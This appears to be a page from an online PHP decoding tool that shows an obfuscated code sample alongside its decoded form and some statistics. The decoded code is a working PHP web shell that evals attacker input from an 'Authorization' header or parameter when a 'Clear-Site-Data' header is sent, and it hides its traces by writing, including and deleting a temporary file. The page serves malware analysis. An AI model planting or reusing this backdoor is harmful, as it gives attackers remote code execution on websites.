Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$_HEADERS = getallheaders();if(isset($_HEADERS['Clear-Site-Data'])){$c="<\x3fp\x68p\x20@\x..
Decoded Output download
<? $_HEADERS = getallheaders();if(isset($_HEADERS['Clear-Site-Data'])){$c="<?php @eval($_REQUEST[\"Authorization\"]);@eval($_HEADERS[\"Authorization\"]);";$f='.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);} ?>
Did this file decode correctly?
Original Code
$_HEADERS = getallheaders();if(isset($_HEADERS['Clear-Site-Data'])){$c="<\x3fp\x68p\x20@\x65v\x61l\x28$\x5fR\x45Q\x55E\x53T\x5b\"\x41u\x74h\x6fr\x69z\x61t\x69o\x6e\"\x5d)\x3b@\x65v\x61l\x28$\x5fH\x45A\x44E\x52S\x5b\"\x41u\x74h\x6fr\x69z\x61t\x69o\x6e\"\x5d)\x3b";$f='.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);}
Function Calls
getallheaders | 1 |
Stats
MD5 | e855c72810079b8b39192bb87c19448e |
Eval Count | 0 |
Decode Time | 46 ms |